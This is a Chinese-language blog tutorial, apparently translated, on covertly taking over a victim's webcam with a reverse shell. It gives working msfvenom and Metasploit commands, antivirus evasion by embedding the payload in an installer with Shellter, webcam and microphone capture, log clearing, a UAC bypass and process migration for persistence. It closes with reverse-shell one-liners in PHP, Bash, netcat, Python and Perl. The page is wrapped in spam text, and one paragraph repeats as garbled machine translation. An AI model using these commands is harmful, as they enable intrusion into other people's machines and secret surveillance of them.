中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何使用反向Shell控制攝像頭

發布時間:2021-11-03 10:16:29 來源:億速云 閱讀:381 作者:小新 欄目:編程語言

這篇文章給大家分享的是有關如何使用反向Shell控制攝像頭的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

如果你已經用膠條封住了你的網絡攝像頭,你可能是因為聽說過黑客或NSA可以遠程監視你。那么問題來了,這些你素未謀面人又是如何遠程連接到你的機器并監視你的呢?

這可能是因為你將你的CCTV,IP攝像頭公開暴露在了互聯網上,而攻擊者又在Shodan等網站上發現了它們。加之你又沒有更改它們的默認密碼和bam,導致攻擊者順利控制了你的攝像頭,并對你的一舉一動進行監視。

以上是物聯網攝像頭最常見的安全問題。但如果是內置的網絡攝像頭,那么更可能的解釋是攻擊者通過Meterpreter payload入侵并控制了它。使用Meterpreter攻擊者可以獲取到一個反向shell,這也是本文將要討論的內容。有關Meterpreter的更多信息,請參閱:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

這里,你可能有個疑問。為什么攻擊者不直接訪問你的機器,而是通過一個反向shell呢?其實原因很簡單,因為直接訪問的方式很可能會被阻止。相比起出站流量,入站流量更容易受到限制。另一方面,如果我們主動進行連接,那么目標機器更有可能放行該流量。這是因為目標機器想要與我們的機器建立連接。

如何使用反向Shell控制攝像頭

msfvenom是一個框架,我們將用它來獲取一個反向shell。它已被預裝在了Parrot和Kali上。首先,讓我們運行以下命令來創建Meterpreter reverse TCP shell payload。

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe

如何使用反向Shell控制攝像頭

創建完成后,現在讓我們來上傳它..........blocked。這是因為MeterPreter payload名聲在外,早已被各個安全軟件所標記,因此大多數的安全軟件都能夠發現阻止/隔離它。

如何使用反向Shell控制攝像頭

我們可以嘗試使用一個名為Shellter的工具,來更改其哈希并將反向shell嵌入到另一個文件當中。之所以選擇將shell嵌入到一個安裝文件中,是因為大多數安裝文件需要以管理員身份運行。正如你在之后將看到的那樣,以管理員身份運行漏洞利用程序,可以為我們省去很多的麻煩。

你可以通過shelter來直接啟動它。同樣,它已被預裝在了Parrot和Kali上。

如何使用反向Shell控制攝像頭

讓我們使用Auto [A]并定位我為本例創建的可執行文件。

如何使用反向Shell控制攝像頭

接下來,我們選擇反向TCP shell并輸入我們機器的IP和端口(攻擊者)。完成后,它會將shell嵌入到你選擇的exe文件中,以便你將其上傳到目標機器。現在你需要通過一種方法將它放到目標機器上,但對于本例我將復制并粘貼。

雖然,我們隱藏了Meterpreter shell,但AV還是成功地檢測到了它。為了便于我們的演示,我們現在暫時先將AV關閉。當然,在現實場景中攻擊者不可能像我這么隨意,更多的是通過技術手段擊潰AV,或是創建一個目標無法檢測的payload。

然而,盡管屏蔽了Meterpreter外殼,AV仍設法檢測到它。 我現在就打算把它關掉,因為我可以。 在現實世界中,攻擊者會將AV癱瘓或使其盲目,以便他們可以降低有效載荷。

現在,讓我們運行它。

在開始之前,讓我們在攻擊機機上加載msfconsole(Metasploit)并運行以下命令:

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.X.X
set LPORT 4444
run

如何使用反向Shell控制攝像頭

你的會話將偵聽反向shell腳本中指定的端口和IP。現在,我們以用戶身份運行exploit:

如何使用反向Shell控制攝像頭

正如你在右側所看到的,我們有幾次會話建立失敗的情況。這就是我之前提到的為什么需要用戶以管理員身份運行的原因。那樣就可以順利運行和注入所有的腳本和DLL。如果用戶以管理員身份運行,你將不會看到任何失敗的情況。如下所示:

如何使用反向Shell控制攝像頭

成功獲取反向shell后,現在我們就可以針對目標機器執行我們想要的操作了。如果你的目標是攝像頭,那么你可以執行以下操作:

Show Webcams: webcam_list
Webcam Snap Help: webcam_snap -h
Take a Picture and don’t load the image after: webcam_snap -i 1 -v false
Record audio: record_mic
Record Webcam: run webcam -p /var/www/
Stop recording: run webcam -s

如何使用反向Shell控制攝像頭

不僅僅是網絡攝像頭(Webcams)。你還可以執行更多其他的命令。例如:清除所有日志(應用程序,系統和安全日志):clearev

這只是一個例子,黑客也不太可能會運行它。因為這么做反而會打草驚蛇提醒了管理員。如果一臺機器你發現所有日志都被清除了,那么你可以初步斷定有人已經使用過它了。相反,攻擊者更有可能的是刪除選擇的事件來掩蓋他們的痕跡。

所有這些都需要管理員權限,而你的用戶可能無法使用提升的權限來運行它。那么,你可以使用像bypassuac_comhijacker這樣的命令。首先,你仍需要得到一個普通用戶級別的反向shell。

獲得shell后,輸入background并按Enter鍵。這會將當前會話移至后臺。然后你就可以針對當前會話使用bypassuac_comhijack漏洞利用程序了,如下:

如何使用反向Shell控制攝像頭

然后,你可以回到原始會話并運行以下命令:

如何使用反向Shell控制攝像頭

成功運行后,你將獲取到一個admin shell。為了與目標機器建立長期穩定的后門連接,我們需要將我們的反向shell隱藏在一個更為隱蔽和穩定的進程中(而不是Putty exe或installer文件中)因為這些應用一旦被關閉,我們的連接就將丟失。這就是為什么我們需要盡快遷移我們的反向shell,到那些可以持續運行進程中的原因。

如何使用反向Shell控制攝像頭

首先,讓我們查看正在運行的進程有哪些。

如何使用反向Shell控制攝像頭

找到相對穩定的進程后,運行migrate [PID]

如何使用反向Shell控制攝像頭

然后,它會將你的Meterpreter會話遷移到另一個進程中。這樣即使他們關閉了被利用的應用程序,你的會話也將被保留。

正如你所看到的,Meterpreter非常的強大。但這并不是你獲得反向shell的唯一方法。你還可以使用Netcat。相比起Meterpreter,某些AV供應商并不將其視為威脅。你可以點擊此處,查看virustotal中的檢測結果。

如何使用反向Shell控制攝像頭

你可以在Parrot或Kali上的usr/share/windows-binaries/nc.exe下找到Netcat。將nc.exe上傳到目標機器后,我們可以運行nc.exe [Attacker IP] [Port] -e cmd.exe。

如何使用反向Shell控制攝像頭

在攻擊者機器上我們需要偵聽連接,這可以通過運行nc -lvp [Chosen port]命令來完成。

你將獲取到一個普通用戶權限的簡單反向shell,這對你來說是一個好的開始。然后,你可以通過它來進一步的利用系統獲得管理員權限。以下是一些運行反向shell的示例:

PHP

php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Bash

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat Linux

nc 192.168.0.10 1234 -e /bin/sh

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Perl

perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,

感謝各位的閱讀!關于“如何使用反向Shell控制攝像頭”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

都昌县| 隆安县| 措勤县| 台山市| 榆林市| 巴塘县| 建瓯市| 陵川县| 织金县| 罗江县| 克山县| 从江县| 肇州县| 绥阳县| 抚宁县| 南宁市| 家居| 杭州市| 普定县| 融水| 盱眙县| 县级市| 邳州市| 遂平县| 洪雅县| 白河县| 华亭县| 维西| 定边县| 永宁县| 鲁甸县| 和平县| 海丰县| 龙南县| 井陉县| 永清县| 澄江县| 济宁市| 肇源县| 禄丰县| 桦南县|